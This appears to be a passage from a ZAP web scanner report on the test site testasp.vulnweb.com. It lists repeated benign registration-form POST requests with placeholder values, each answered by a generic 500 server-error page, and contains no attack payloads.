| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
